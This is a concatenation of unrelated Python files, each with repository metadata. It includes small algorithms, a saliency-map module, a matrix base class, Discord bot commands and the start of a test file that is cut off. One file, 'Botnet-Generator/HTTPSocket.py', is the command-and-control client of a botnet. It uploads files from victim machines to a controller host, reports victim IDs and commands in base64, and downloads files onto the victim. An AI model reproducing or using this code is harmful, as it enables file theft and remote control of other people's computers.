bb1296c730e04aac4e482709b1a4e2821eed085b | 177 | py | Python | My Tools/Number Reverse/numberReverse.py | AbhyasKanaujia/Project-Euler | 9359474e87ac86c89872692fb162119ca0841251 | [
"MIT"
] | 2 | 2020-11-18T15:10:03.000Z | 2020-11-22T08:28:15.000Z | My Tools/Number Reverse/numberReverse.py | AbhyasKanaujia/Project-Euler | 9359474e87ac86c89872692fb162119ca0841251 | [
"MIT"
] | null | null | null | My Tools/Number Reverse/numberReverse.py | AbhyasKanaujia/Project-Euler | 9359474e87ac86c89872692fb162119ca0841251 | [
"MIT"
] | null | null | null | num = int(input("Enter a number: "))
temp = num
reverse = 0
while(temp):
reverse = (reverse * 10) + (temp % 10)
temp = int(temp / 10)
print("Reversed: " + str(reverse)) | 22.125 | 42 | 0.59322 | 25 | 177 | 4.2 | 0.56 | 0.114286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.050725 | 0.220339 | 177 | 8 | 43 | 22.125 | 0.710145 | 0 | 0 | 0 | 0 | 0 | 0.146067 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
bb13062c6af81b0c777ea745fa403b4616b78912 | 1,267 | py | Python | Botnet-Generator/HTTPSocket.py | m4ta1l/KratosKnife | ff80631c2d1d865806e2da1e810239aa401891e8 | [
"BSD-3-Clause"
] | 155 | 2020-09-04T12:26:10.000Z | 2022-03-09T02:20:27.000Z | Botnet-Generator/HTTPSocket.py | m4ta1l/KratosKnife | ff80631c2d1d865806e2da1e810239aa401891e8 | [
"BSD-3-Clause"
] | 14 | 2020-12-27T06:25:20.000Z | 2022-03-01T04:27:01.000Z | Botnet-Generator/HTTPSocket.py | m4ta1l/KratosKnife | ff80631c2d1d865806e2da1e810239aa401891e8 | [
"BSD-3-Clause"
] | 57 | 2020-10-11T15:21:35.000Z | 2022-03-23T19:46:30.000Z | import requests, base64
class HTTPSocket:
def __init__(self, host, victim_id):
self.host = host
self.victim_id = victim_id
def _GET(self, filename, request):
requests.get(url=self.host + filename, params=request)
def _POST(self, filename, request):
requests.post(url=self.host + filename, data=request)
def Upload(self, filepath):
url = self.host + "upload.php"
files = {'file': open(filepath, 'rb')}
victim_id = { 'id' : base64.b64encode(str(self.victim_id).encode('UTF-8'))}
requests.post(url, files=files, params=victim_id)
def Connect(self, clientdata):
payload = { 'data': base64.b64encode(clientdata.encode('UTF-8')) }
self._GET("connection.php", payload)
def Send(self,command):
payload = {'command': base64.b64encode(command.encode()), 'vicID': base64.b64encode(str(self.victim_id).encode())}
self._GET("receive.php", payload)
def Log(self, type, message):
self.Send("NewLog" + "|BN|" + type + "|BN|" + message)
def Download(self, url, destinationPath):
file = requests.get(url)
open(destinationPath, 'wb').write(file.content)
| 35.194444 | 123 | 0.595107 | 146 | 1,267 | 5.061644 | 0.328767 | 0.075778 | 0.048714 | 0.073072 | 0.097429 | 0.097429 | 0.097429 | 0 | 0 | 0 | 0 | 0.021299 | 0.258879 | 1,267 | 36 | 124 | 35.194444 | 0.765708 | 0 | 0 | 0 | 0 | 0 | 0.068938 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.32 | false | 0 | 0.04 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb1432cc0316cac36dc4f14023445d368e2c8a51 | 790 | py | Python | Binary Search/081. Search in Rotated Sorted Array II.py | beckswu/Leetcode | 480e8dc276b1f65961166d66efa5497d7ff0bdfd | [
"MIT"
] | 138 | 2020-02-08T05:25:26.000Z | 2021-11-04T11:59:28.000Z | Binary Search/081. Search in Rotated Sorted Array II.py | beckswu/Leetcode | 480e8dc276b1f65961166d66efa5497d7ff0bdfd | [
"MIT"
] | null | null | null | Binary Search/081. Search in Rotated Sorted Array II.py | beckswu/Leetcode | 480e8dc276b1f65961166d66efa5497d7ff0bdfd | [
"MIT"
] | 24 | 2021-01-02T07:18:43.000Z | 2022-03-20T08:17:54.000Z | """
81. Search in Rotated Sorted Array II
"""
class Solution:
def search(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: bool
"""
l, r, n = 0, len(nums)-1, len(nums)
while l<=r:
while r>l and nums[l+1]==nums[l]:
l+=1
while r>l and nums[r-1] == nums[r]:
r-=1
mid = (l+r)>>1
if nums[mid] == target: return True
if target > nums[mid]:
if nums[l]>nums[mid] and nums[l]<=target: r = mid-1
else: l = mid+1
else:
if nums[mid]>nums[r] and nums[r]>=target: l = mid+1
else: r = mid-1
return False
| 29.259259 | 68 | 0.405063 | 106 | 790 | 3.018868 | 0.301887 | 0.0875 | 0.075 | 0.0625 | 0.0875 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030374 | 0.458228 | 790 | 26 | 69 | 30.384615 | 0.71729 | 0.113924 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0 | 0 | 0.176471 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb153760d668539261a0d33707c85c1e1d93f62e | 191 | py | Python | PEPit/tools/__init__.py | bgoujaud/PEPit | 7352607069f5e90fb1919fc689ec5e9d745c3bac | [
"MIT"
] | 44 | 2021-11-18T16:41:20.000Z | 2022-02-14T09:59:13.000Z | PEPit/tools/__init__.py | bgoujaud/PEPit | 7352607069f5e90fb1919fc689ec5e9d745c3bac | [
"MIT"
] | 2 | 2021-10-05T09:20:25.000Z | 2022-02-19T13:58:01.000Z | PEPit/tools/__init__.py | PerformanceEstimation/PEPit | 7005bc9a9da11dea448966437365c897734ec341 | [
"MIT"
] | 1 | 2022-02-08T12:03:29.000Z | 2022-02-08T12:03:29.000Z | from .dict_operations import merge_dict, prune_dict, multiply_dicts
__all__ = ['dict_operations',
'merge_dict',
'prune_dict',
'multiply_dicts',
]
| 23.875 | 67 | 0.602094 | 19 | 191 | 5.421053 | 0.473684 | 0.271845 | 0.271845 | 0.349515 | 0.601942 | 0.601942 | 0 | 0 | 0 | 0 | 0 | 0 | 0.303665 | 191 | 7 | 68 | 27.285714 | 0.774436 | 0 | 0 | 0 | 0 | 0 | 0.256545 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 5 |
bb16c061583288ca3f3f83e5792419424b095ace | 2,777 | py | Python | methods/ham.py | vickyyu90/maxnet | 38c49c39dbe77b2984d8cdb2f4087310b2220593 | [
"Apache-2.0"
] | null | null | null | methods/ham.py | vickyyu90/maxnet | 38c49c39dbe77b2984d8cdb2f4087310b2220593 | [
"Apache-2.0"
] | null | null | null | methods/ham.py | vickyyu90/maxnet | 38c49c39dbe77b2984d8cdb2f4087310b2220593 | [
"Apache-2.0"
] | null | null | null | import numpy as np
import torch
from torch.autograd import Variable
import torch.nn.functional as F
class FeatureExtractor():
def __init__(self, model, intermediate_layers):
self.model = model
self.intermediate_layers = intermediate_layers[::-1]
self.weights = []
self.num = len(self.intermediate_layers)
self.activations = []
def save_weight(self, grad):
self.weights.append(grad)
def __call__(self, x, intermediate_layers, class_idx):
hams = []
logit, conv3, conv4, conv5 = self.model(x)
logit = F.softmax(logit)
score = logit[:, class_idx].squeeze()
if torch.cuda.is_available():
score = score.cuda()
self.model.zero_grad()
score.backward(retain_graph=True)
saliency_map = torch.mul(conv3, self.model.grads['conv3']).mean(dim=1, keepdim=True)
norm_saliency_map = (saliency_map - saliency_map.min()) / (saliency_map.max() - saliency_map.min())
hams.append(F.relu(norm_saliency_map, inplace=True))
saliency_map = torch.mul(conv4, self.model.grads['conv4']).mean(dim=1, keepdim=True)
norm_saliency_map = (saliency_map - saliency_map.min()) / (saliency_map.max() - saliency_map.min())
hams.append(F.relu(norm_saliency_map, inplace=True))
saliency_map = torch.mul(conv5, self.model.grads['conv5']).mean(dim=1, keepdim=True)
norm_saliency_map = (saliency_map - saliency_map.min()) / (saliency_map.max() - saliency_map.min())
hams.append(F.relu(norm_saliency_map, inplace=True))
return hams
class HAM():
def __init__(self, model, intermediate_layers):
self.model = model
self.intermediate_layers = intermediate_layers
self.extractor = FeatureExtractor(self.model, intermediate_layers)
def __call__(self, input, device, intermediate_layers, class_idx):
hams = self.extractor(input, intermediate_layers, class_idx)
for i in range(len(intermediate_layers)):
if i == 0:
aggregated_ham = hams[i]
else:
tmp = F.interpolate(hams[i], hams[0].shape[-3:], mode='trilinear', align_corners=False)
aggregated_ham = torch.mul(tmp, torch.ge(tmp, aggregated_ham)) + torch.mul(aggregated_ham, torch.ge(aggregated_ham, tmp))
B, L, C, H, W = aggregated_ham.shape
aggregated_ham = aggregated_ham.view(B, -1)
aggregated_ham -= aggregated_ham.min(dim=1, keepdim=True)[0]
aggregated_ham /= aggregated_ham.max(dim=1, keepdim=True)[0]
aggregated_ham = aggregated_ham.view(B, L, C, H, W)
aggregated_ham = F.interpolate(aggregated_ham, input.shape[-3:], mode='trilinear', align_corners=False)
return aggregated_ham | 43.390625 | 137 | 0.658985 | 358 | 2,777 | 4.882682 | 0.24581 | 0.132151 | 0.051487 | 0.075515 | 0.519451 | 0.471968 | 0.451945 | 0.39016 | 0.39016 | 0.342105 | 0 | 0.010096 | 0.21534 | 2,777 | 64 | 138 | 43.390625 | 0.792106 | 0 | 0 | 0.192308 | 0 | 0 | 0.011879 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.096154 | false | 0 | 0.076923 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb177b31aa9101d899611eb71a8b7cb4ca24eeba | 1,173 | py | Python | wicket/commands/__init__.py | GeekMasher/wicket-discord-docker-bot | 5f7bfa466718018fba3babe1357115ac19a8ec18 | [
"MIT"
] | null | null | null | wicket/commands/__init__.py | GeekMasher/wicket-discord-docker-bot | 5f7bfa466718018fba3babe1357115ac19a8ec18 | [
"MIT"
] | null | null | null | wicket/commands/__init__.py | GeekMasher/wicket-discord-docker-bot | 5f7bfa466718018fba3babe1357115ac19a8ec18 | [
"MIT"
] | null | null | null | import discord
from wicket.commands.list import botListServices
from wicket.commands.docker_commands import *
async def botHelp(cxt, message: discord.Message, **kargvs):
TEXT = "Help Options:\n"
for name, command in COMMANDS.items():
TEXT += f" - `{cxt.__PREFIX__} {name}` - {command.get('description')}"
if command.get("auth"):
TEXT += " (auth required)"
TEXT += "\n"
await message.channel.send(TEXT)
COMMANDS = {
"help": {"func": botHelp, "auth": False, "description": "Get help with the bot"},
"list": {
"func": botListServices,
"auth": False,
"description": "Get a list of services",
},
"start": {
"func": botStartServices,
"auth": True,
"description": "Start a service",
},
"restart": {
"func": botRestartServices,
"auth": True,
"description": "Restart a service",
},
"stop": {
"func": botStopServices,
"auth": True,
"description": "Stop a service",
},
"update": {
"func": botUpdateServices,
"auth": True,
"description": "Update the service",
},
}
| 24.4375 | 85 | 0.553282 | 113 | 1,173 | 5.699115 | 0.451327 | 0.049689 | 0.118012 | 0.071429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.287298 | 1,173 | 47 | 86 | 24.957447 | 0.770335 | 0 | 0 | 0.102564 | 0 | 0 | 0.295823 | 0.02387 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb17d26fa2cfe52fac2399248342acf911c767f1 | 125 | py | Python | rl_helper/__init__.py | yiwc/rl_helper | 3cb0c088b40dabd3fa17af6e53f7c9563c7ef8b8 | [
"MIT"
] | null | null | null | rl_helper/__init__.py | yiwc/rl_helper | 3cb0c088b40dabd3fa17af6e53f7c9563c7ef8b8 | [
"MIT"
] | null | null | null | rl_helper/__init__.py | yiwc/rl_helper | 3cb0c088b40dabd3fa17af6e53f7c9563c7ef8b8 | [
"MIT"
] | null | null | null | from rl_helper.envhelper import envhelper,VDisplay
from rl_helper.fps import fps
from rl_helper.exps import ExperimentManager | 41.666667 | 50 | 0.88 | 19 | 125 | 5.631579 | 0.473684 | 0.168224 | 0.336449 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088 | 125 | 3 | 51 | 41.666667 | 0.938596 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bb1819c9bd2f8222a4a5fb0e41cee2222fe0b742 | 12,923 | py | Python | abstract_matrix.py | sredroboto/math-matrix | 71b8d53fb2b3bd7f8a27dde6a5ee2a4847b135ad | [
"BSD-3-Clause"
] | 2 | 2019-11-21T14:28:50.000Z | 2019-11-21T20:58:46.000Z | abstract_matrix.py | sredroboto/SistemaSolar | 4fa946adab7e5308639954feb00a2b3bc7153f91 | [
"BSD-3-Clause"
] | null | null | null | abstract_matrix.py | sredroboto/SistemaSolar | 4fa946adab7e5308639954feb00a2b3bc7153f91 | [
"BSD-3-Clause"
] | null | null | null | from abc import ABC, abstractmethod
class AbstractMatrix(ABC):
"""
Classe utilizada para representar uma matriz
"""
def __init__(self, rows, cols, data = []):
"""
Args:
rows: Quantidade de linhas da matriz
cols: Quantidade de colunas da matriz
data: Lista com os valores da matriz,
caso a lista seja vazia deve-se preencher com zeros
"""
self.rows = rows
self.cols = cols
self._init_data(data)
@abstractmethod
def __getitem__(self, key):
"""Recupera um valor armazenado na matriz.
Recupera um valor armazenado na posição i, j. A indexação da matriz inicia-se em 1.
Args:
key: Tupla que contém os valores de i e j
Returns:
data: O valor armazenado na posição i, j
"""
pass
@abstractmethod
def __setitem__(self, key, value):
"""Armazena um valor na matriz.
Armazena um valor na posição i, j. A indexação da matriz inicia-se em 1.
Args:
key: Tupla que contém os valores de i e j
value: Valor a ser armazenado na matriz
"""
pass
@abstractmethod
def __repr__(self):
"""Representação em formato string da matriz.
Exibe os dados armazenados em formato de matrix quando o objeto é chamado
sem nenhuma invocação de método.
Returns:
Exibe os dados da matriz formatados no console. Por exemplo:
#> a = Matrix(2,2,[1, 2, 3, 4])
#> a
1.0000 2.0000
3.0000 4.0000
"""
pass
@abstractmethod
def __str__(self):
"""Representação em formato string da matriz durante conversão.
Exibe os dados armazenados em formato de matrix quando o objeto é convertido para string.
Returns:
Exibe os dados da matriz formatados no console. Por exemplo:
#> a = Matrix(2,2,[1, 2, 3, 4])
#> a
1.0000 2.0000
3.0000 4.0000
"""
pass
@abstractmethod
def __radd__(self, other):
"""Realiza a soma da matrix como operando direito.
Realiza a soma da matrix, como operando direito, com outra matrix ou escalar.
Para realizar a soma de matrizes, ambas necessitam possuir o mesmo tamanho e na soma
de um escalar com a matriz, some o escalar com cada elemento da matriz.
Args:
other: Matrix ou escalar a ser somado com o objeto atual
Returns:
Retorna a matrix resultante da operação, por exemplo:
#> a = Matrix(2,2,[1, 2, 3, 4])
#> b = Matrix(2,2,[2, 4, 6, 8])
#> c = b + a
#> c
3.0000 6.0000
9.0000 12.0000
#> a = Matrix(2,2,[1, 2, 3, 4])
#> c = 2 + a
#> c
3.0000 4.0000
5.0000 6.0000
"""
pass
@abstractmethod
def __add__(self, other):
"""Realiza a soma da matrix como operando esquerdo.
Realiza a soma da matrix, como operando esquerdo, com outra matrix ou escalar.
Para realizar a soma de matrizes, ambas necessitam possuir o mesmo tamanho e na soma
de um escalar com a matriz, some o escalar com cada elemento da matriz.
Args:
other: Matrix ou escalar a ser somado com o objeto atual
Returns:
Retorna a matrix resultante da operação, por exemplo:
#> a = Matrix(2,2,[1, 2, 3, 4])
#> b = Matrix(2,2,[2, 4, 6, 8])
#> c = a + b
#> c
3.0000 6.0000
9.0000 12.0000
#> a = Matrix(2,2,[1, 2, 3, 4])
#> c = a + 2
#> c
3.0000 4.0000
5.0000 6.0000
"""
pass
@abstractmethod
def __rsub__(self, other):
"""Realiza a subtração da matrix como operando direito.
Realiza a subtração da matrix, como operando direito, com outra matrix ou escalar.
Para realizar a subtração de matrizes, ambas necessitam possuir o mesmo tamanho e na subtração
de um escalar com a matriz, subtraia o escalar com cada elemento da matriz.
Args:
other: Matrix ou escalar a ser subtraido com o objeto atual
Returns:
Retorna a matrix resultante da operação, por exemplo:
#> a = Matrix(2,2,[1, 2, 3, 4])
#> b = Matrix(2,2,[2, 4, 6, 8])
#> c = b - a
#> c
1.0000 2.0000
3.0000 4.0000
#> a = Matrix(2,2,[1, 2, 3, 4])
#> c = 1 - a
#> c
0.0000 1.0000
2.0000 3.0000
"""
pass
@abstractmethod
def __sub__(self, other):
"""Realiza a subtração da matrix como operando esquerdo.
Realiza a subtração da matrix, como operando esquerdo, com outra matrix ou escalar.
Para realizar a subtração de matrizes, ambas necessitam possuir o mesmo tamanho e na subtração
de um escalar com a matriz, subtraia o escalar com cada elemento da matriz.
Returns:
Retorna a matrix resultante da operação, por exemplo:
#> a = Matrix(2,2,[1, 2, 3, 4])
#> b = Matrix(2,2,[2, 4, 6, 8])
#> c = a - b
#> c
-1.0000 -2.0000
-3.0000 -4.0000
#> a = Matrix(2,2,[1, 2, 3, 4])
#> c = a - 1
#> c
0.0000 1.0000
2.0000 3.0000
"""
pass
@abstractmethod
def __rmul__(self, other):
"""Realiza a multiplicação elemento a elemento da matrix como operando direito.
Realiza a multiplicação elemento a elemento da matrix, como operando direito,
com outra matrix ou escalar.
Para realizar a multiplicação elemento a elemento de matrizes, ambas necessitam
possuir o mesmo tamanho e na multiplicação elemento a elemento de um escalar com
a matriz, multiplique o escalar com cada elemento da matriz.
Args:
other: Matrix ou escalar a ser multiplicado com o objeto atual
Returns:
Retorna a matrix resultante da operação, por exemplo:
#> a = Matrix(2,2,[1, 2, 3, 4])
#> b = Matrix(2,2,[2, 4, 6, 8])
#> c = b * a
#> c
2.0000 8.0000
18.0000 32.0000
#> a = Matrix(2,2,[1, 2, 3, 4])
#> c = 2 * a
#> c
2.0000 4.0000
8.0000 8.0000
"""
pass
@abstractmethod
def __mul__(self, other):
"""Realiza a multiplicação elemento a elemento da matrix como operando esquerdo.
Realiza a multiplicação elemento a elemento da matrix, como operando esquerdo,
com outra matrix ou escalar.
Para realizar a multiplicação elemento a elemento de matrizes, ambas necessitam
possuir o mesmo tamanho e na multiplicação elemento a elemento de um escalar com
a matriz, multiplique o escalar com cada elemento da matriz.
Returns:
Retorna a matrix resultante da operação, por exemplo:
#> a = Matrix(2,2,[1, 2, 3, 4])
#> b = Matrix(2,2,[2, 4, 6, 8])
#> c = a * b
#> c
2.0000 8.0000
18.0000 32.0000
#> a = Matrix(2,2,[1, 2, 3, 4])
#> c = a * 2
#> c
2.0000 4.0000
8.0000 8.0000
"""
pass
@abstractmethod
def __rtruediv__(self, other):
"""Realiza a divisão elemento a elemento da matrix como operando direito.
Realiza a divisão elemento a elemento da matrix, como operando direito,
com outra matrix ou escalar.
Para realizar a divisão elemento a elemento de matrizes, ambas necessitam
possuir o mesmo tamanho e na divisão elemento a elemento de um escalar com
a matriz, divida o escalar com cada elemento da matriz.
Args:
other: Matrix ou escalar a ser dividido com o objeto atual
Returns:
Retorna a matrix resultante da operação, por exemplo:
#> a = Matrix(2,2,[1, 2, 3, 4])
#> b = Matrix(2,2,[2, 4, 6, 8])
#> c = b / a
#> c
2.0000 2.0000
2.0000 2.0000
#> a = Matrix(2,2,[1, 2, 3, 4])
#> c = 2 / a
#> c
0.5000 1.0000
1.5000 2.0000
"""
pass
@abstractmethod
def __truediv__(self, other):
"""Realiza a divisão elemento a elemento da matrix como operando esquerdo.
Realiza a divisão elemento a elemento da matrix, como operando esquerdo,
com outra matrix ou escalar.
Para realizar a divisão elemento a elemento de matrizes, ambas necessitam
possuir o mesmo tamanho e na divisão elemento a elemento de um escalar com
a matriz, divida o escalar com cada elemento da matriz.
Args:
other: Matrix ou escalar a ser dividido com o objeto atual
"Returns:
Retorna a matrix resultante da operação, por exemplo:
#> a = Matrix(2,2,[1, 2, 3, 4])
#> b = Matrix(2,2,[2, 4, 6, 8])
#> c = a / b
#> c
0.5000 0.5000
0.5000 0.5000
#> a = Matrix(2,2,[1, 2, 3, 4])
#> c = a / 2
#> c
0.5000 1.0000
1.5000 2.0000
"""
pass
@abstractmethod
def dot(self, other):
"""Realiza a multiplicação entre matrizes
Para realizar a multiplicação entre matrizes, a primeira matriz deve possuir
uma quantidade de colunas igual a quantidade de linhas da segunda matriz.
Args:
other: Matrix a ser multiplicada com o objeto atual
"Returns:
Retorna a matrix resultante da operação, por exemplo:
#> a = Matrix(2,2,[1, 2, 3, 4])
#> b = Matrix(2,2,[2, 4, 6, 8])
#> c = a.dot(b)
#> c
14.0000 20.0000
30.0000 44.0000
"""
pass
@abstractmethod
def transpose(self):
"""Realiza a transposição de uma matriz
A transposição de uma matriz altera a posição do elemento ij para a posição ji.
"Returns:
Retorna a matrix resultante da operação, por exemplo:
#> a = Matrix(2,3,[1, 2, 3, 4, 5, 6])
#> a
1.0000 2.0000 3.0000
4.0000 5.0000 6.0000
#> c = a.transpose()
#> c
1.0000 4.0000
2.0000 5.0000
3.0000 6.0000
"""
pass
@abstractmethod
def gauss_jordan(self):
"""Aplica o algoritmo de Gauss Jordan na matriz
Aplica o método de Gauss-Jordan na matriz corrente. Pode ser utilizado para resolver
um sistema de equações lineares, calcular matrix inversa, etc.
"Returns:
Retorna a matrix resultante da operação, por exemplo:
#> a = Matrix(3,4,[1, -2, 1, 0, 0, 2, -8, 8, 5, 0, -5, 10])
#> a
1.0000 -2.0000 1.0000 0.0000
0.0000 2.0000 -8.0000 8.0000
5.0000 0.0000 -5.0000 10.0000
#> c = a.gauss_jordan()
#> c
1.0000 0.0000 0.0000 1.0000
0.0000 1.0000 0.0000 0.0000
0.0000 0.0000 1.0000 -1.0000
"""
pass
@abstractmethod
def inverse(self):
"""Calcula a matriz inversa da matriz corrente
Realiza o calculo da matrix inversa utilizando o algoritmo de Gauss-Jordan.
"Returns:
Retorna a matrix resultante da operação, por exemplo:
#> a = Matrix(2,2,[1, 2, 3, 4])
#> a
1.0000 -2.0000 1.0000 0.0000
0.0000 2.0000 -8.0000 8.0000
5.0000 0.0000 -5.0000 10.0000
#> c = a.inverse()
#> c
-2.0000 1.0000
1.5000 -0.5000
"""
pass
def _init_data(self, data):
if data:
try:
if len(data) == self.rows * self.cols:
self.data = data
else:
raise Exception('Init error', 'The data is incompatible with matrix size')
except Exception as e:
print(e)
else:
self.data = [0] * (self.rows * self.cols) | 30.550827 | 102 | 0.514973 | 1,684 | 12,923 | 3.917458 | 0.114608 | 0.01152 | 0.035168 | 0.012733 | 0.787176 | 0.758375 | 0.742762 | 0.72245 | 0.707594 | 0.678035 | 0 | 0.111457 | 0.402925 | 12,923 | 423 | 103 | 30.550827 | 0.74352 | 0.702159 | 0 | 0.523077 | 0 | 0 | 0.028814 | 0 | 0 | 0 | 0 | 0.004728 | 0 | 1 | 0.276923 | false | 0.246154 | 0.015385 | 0 | 0.307692 | 0.015385 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
bb186d9ac7e63873279e945b49b97d3ba19eab1c | 534 | py | Python | P0003.py | sebastianaldi17/ProjectEuler | 19562fba3456ec904bcc264fb786a92610e42622 | [
"MIT"
] | null | null | null | P0003.py | sebastianaldi17/ProjectEuler | 19562fba3456ec904bcc264fb786a92610e42622 | [
"MIT"
] | null | null | null | P0003.py | sebastianaldi17/ProjectEuler | 19562fba3456ec904bcc264fb786a92610e42622 | [
"MIT"
] | null | null | null | # Largest prime factor
# https://projecteuler.net/problem=3
# Sieve of erasthotenes apporach
# But still slow due to iteration to sqrt(n)
from math import sqrt
question = 600851475143
def solve(n):
ans = 1
limit = int(sqrt(n))
prime = [True for i in range(limit+1)]
p = 2
while p <= limit:
if prime[p]:
for i in range(p*2, limit+1, p):
prime[i] = False
p += 1
for i in range(2, limit+1):
if n%i==0 and prime[i]: ans = i
return ans
print(solve(question)) | 25.428571 | 44 | 0.586142 | 87 | 534 | 3.597701 | 0.517241 | 0.038339 | 0.057508 | 0.105431 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058511 | 0.29588 | 534 | 21 | 45 | 25.428571 | 0.773936 | 0.241573 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.0625 | 0 | 0.1875 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb1a364dd066752f967226672bd3ed108b79d4bc | 239 | py | Python | data_structures/binary_heap_operations.py | johnnydevriese/python_fun | 01fc5fcc82c7c27e25eabff85a2e88f3554129fe | [
"MIT"
] | null | null | null | data_structures/binary_heap_operations.py | johnnydevriese/python_fun | 01fc5fcc82c7c27e25eabff85a2e88f3554129fe | [
"MIT"
] | null | null | null | data_structures/binary_heap_operations.py | johnnydevriese/python_fun | 01fc5fcc82c7c27e25eabff85a2e88f3554129fe | [
"MIT"
] | null | null | null | from pythonds.trees.binheap import BinHeap
# pythonds so we need to use python2.7 to run
bh = BinHeap()
bh.insert(5)
bh.insert(7)
bh.insert(3)
bh.insert(11)
print(bh.delMin())
print(bh.delMin())
print(bh.delMin())
print(bh.delMin())
| 13.277778 | 45 | 0.707113 | 42 | 239 | 4.02381 | 0.47619 | 0.189349 | 0.307692 | 0.319527 | 0.307692 | 0.307692 | 0.307692 | 0.307692 | 0.307692 | 0 | 0 | 0.033654 | 0.129707 | 239 | 17 | 46 | 14.058824 | 0.778846 | 0.179916 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.1 | 0.4 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
bb1bdf6c26b937672babc629910c4f289f158546 | 3,893 | py | Python | test/unit/extractor/test_sticky_relations.py | willangenent/abridger | 6daa80f7360339376b38544ce60694c5addaa30f | [
"MIT"
] | 8 | 2016-10-19T14:15:34.000Z | 2020-06-23T09:37:02.000Z | test/unit/extractor/test_sticky_relations.py | freewilll/abridger | 6daa80f7360339376b38544ce60694c5addaa30f | [
"MIT"
] | null | null | null | test/unit/extractor/test_sticky_relations.py | freewilll/abridger | 6daa80f7360339376b38544ce60694c5addaa30f | [
"MIT"
] | null | null | null | import pytest
from abridger.extraction_model import Relation
from abridger.schema import SqliteSchema
from test.unit.extractor.base import TestExtractorBase
class TestExtractorStickyRelations(TestExtractorBase):
@pytest.fixture()
def schema_out(self):
'''
test1 -> sticky -> test3 <- test2
-> non_sticky -> test3 <- test2
'''
for stmt in [
'''
CREATE TABLE non_sticky (
id INTEGER PRIMARY KEY,
test3_id INTEGER REFERENCES test3
);
''', '''
CREATE TABLE sticky (
id INTEGER PRIMARY KEY,
test3_id INTEGER REFERENCES test3
);
''', '''
CREATE TABLE test1 (
id INTEGER PRIMARY KEY,
sticky INTEGER REFERENCES sticky,
non_sticky INTEGER REFERENCES non_sticky
);
''', '''
